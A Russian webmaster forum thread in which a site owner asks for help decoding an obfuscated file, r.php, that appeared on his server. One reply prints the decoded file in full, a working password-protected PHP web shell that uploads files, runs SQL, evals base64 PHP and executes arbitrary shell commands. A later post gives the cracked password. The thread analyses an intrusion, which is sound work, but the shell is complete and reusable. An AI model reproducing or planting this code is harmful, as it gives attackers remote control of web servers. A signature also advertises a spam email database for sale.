Помогите расшифровать эту дрянь...

123
Oshparennij
На сайте с 14.01.2008
Offline
174
#11
Масол:
Oshparennij, http://www.base64.ru/

это не берет....

---------- Добавлено 25.06.2012 в 18:52 ----------

olololo:
это защита от ботов

откуда знаете? Как она появилась у меня? файл r.php

Продам базу email (usa), валид 99%. Пишите в личку.
[Удален]
#12
Масол:
Oshparennij, http://www.base64.ru/

Да нет, там наверняка обфускатором обработали, расшифровке практически не поддаётся...

Сносить надо эту хрень и, как верно заметили выше, разбираться, как оная попала на сайт.

---------- Добавлено 25.06.2012 в 19:08 ----------

Oshparennij:
файл r.php

Он у вас ранее присутствовал?

Oshparennij
На сайте с 14.01.2008
Offline
174
#13

если бы ранее присутствовала. вообще не парился бы... Расшифровать бы...

D
На сайте с 20.05.2012
Offline
18
#14

kaimi ru ищи там расшифровщик. и скинь сюда плс когда расшифруешь.

M
На сайте с 07.11.2009
Offline
29
#15

Напиши в саппорт хостинга, наверное его взломали если сайт не дырявый.

S
На сайте с 19.05.2008
Offline
30
#16


<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
ini_set('display_errors', "0");

if ($_POST["p"] != "") {
$_COOKIE["p"] = $_POST["p"];
setcookie("p", $_POST["p"], time() + 3600);
}

if (md5($_COOKIE["p"]) != "ca3f717a5e53f4ce47b9062cfbfb2458") {
echo "<form method=post>";
echo "<input type=text name=p value='' size=50>";
echo "<input type=submit name=B_SUBMIT value='Check'>";
echo "</form>";
exit;
}

if ($_POST["action"] == "upload") {
$l = $_FILES["filepath"]["tmp_name"];
$newpath = $_POST["newpath"];
if ($newpath != "") move_uploaded_file($l, $newpath);
echo "done";

} else if ($_POST["action"] == "sql") {
$query = $_POST["query"];
$query = str_replace("\'","'",$query);
$lnk = mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or die ('Not connected : ' . mysql_error());
mysql_select_db($_POST["db"], $lnk) or die ('Db failed: ' . mysql_error());
mysql_query($query, $lnk) or die ('Invalid query: ' . mysql_error());
mysql_close($lnk);
echo "done<br><pre>$query</pre>";

} else if ($_POST["action"] == "runphp") {
eval(base64_decode($_POST["cmd"]));
} else {
$disablefunc = @ini_get("disable_functions");

if (!empty($disablefunc)) {
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
} else
$disablefunc = array();



function myshellexec($cmd) {

global $disablefunc;

$result = "";

if (!empty($cmd)) {

if (is_callable("exec") and !@in_array("exec",$disablefunc)) {@exec($cmd,$result); $result = @join("\n",$result);}

elseif (($result = `$cmd`) !== FALSE) {}

elseif (is_callable("system") and !@in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

elseif (is_callable("passthru") and !@in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

elseif (is_resource($fp = @popen($cmd,"r"))) {

$result = "";

while(!feof($fp)) {$result .= @fread($fp,1024);}

@pclose($fp);

}

}

return $result;

}

$cmd = stripslashes($_POST["cmd"]);

$cmd_enc = stripslashes($_POST["cmd_enc"]);

if ($_POST["enc"]==1){

$cmd=base64_decode($cmd_enc);

}
?>

<script language=javascript type="text/javascript">

<!--

var END_OF_INPUT = -1;

var base64Chars = new Array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/');

var reverseBase64Chars = new Array();

for (var i=0; i < base64Chars.length; i++){

reverseBase64Chars[base64Chars] = i;

}

var base64Str;

var base64Count;

function setBase64Str(str){

base64Str = str;

base64Count = 0;

}

function readBase64(){

if (!base64Str) return END_OF_INPUT;

if (base64Count >= base64Str.length) return END_OF_INPUT;

var c = base64Str.charCodeAt(base64Count) & 0xff;

base64Count++;

return c;

}

function encodeBase64(str){
setBase64Str(str);
var result = '';
var inBuffer = new Array(3);
var lineCount = 0;
var done = false;

while (!done && (inBuffer[0] = readBase64()) != END_OF_INPUT){

inBuffer[1] = readBase64();
inBuffer[2] = readBase64();
result += (base64Chars[ inBuffer[0] >> 2 ]);

if (inBuffer[1] != END_OF_INPUT){

result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30) | (inBuffer[1] >> 4) ]);

if (inBuffer[2] != END_OF_INPUT){

result += (base64Chars [((inBuffer[1] << 2) & 0x3c) | (inBuffer[2] >> 6) ]);

result += (base64Chars [inBuffer[2] & 0x3F]);

} else {

result += (base64Chars [((inBuffer[1] << 2) & 0x3c)]);

result += ('=');

done = true;

}

} else {

result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30)]);

result += ('=');

result += ('=');

done = true;

}

lineCount += 4;

if (lineCount >= 76){

result += ('\n');

lineCount = 0;

}

}

return result;

}

function encodeIt(f){
l = encodeBase64(f.cmd.value);
f.cmd_enc.value = l;
f.cmd.value = "";
f.enc.value = 1;
f.submit();
}

//--></script>

<?php
echo "<form method=post action='' onSubmit='encodeIt(this);return false;'>";
echo "<input type=text name=cmd value=\"".str_replace("\"","&quot;",$cmd)."\" size=150>";
echo "<input type=hidden name=enc value='0'>";
echo "<input type=hidden name=cmd_enc value=''>";
echo "<input type=submit name=B_SUBMIT value='Go'>";
echo "</form>";

if ($cmd != "") {
echo "<pre>";
$cmd = stripslashes($cmd);
echo "Executing $cmd \n";
echo myshellexec("$cmd");
echo "</pre>";
exit;
}
}
?>
LEOnidUKG
На сайте с 25.11.2006
Offline
1774
#17

Шел только для тех у кого спец. кука т.е. у хакера :)

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
zennomen
На сайте с 24.12.2011
Offline
26
#18
Oshparennij:
Расшифровать бы...

Расшифровали, сильно помогло ? :)

АПАЧ МНОГОПОТОЧЕН НА МОЕМ АТЛОНЕ! Не знаю пэХАпэ...
Geers
На сайте с 12.04.2011
Offline
487
#19
думаю:
Продолжения больше не будет :-D ?

Я тоже очень на это надеялся)

S
На сайте с 19.05.2008
Offline
30
#20

md5

ca3f717a5e53f4ce47b9062cfbfb2458 - showmustgoon!

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий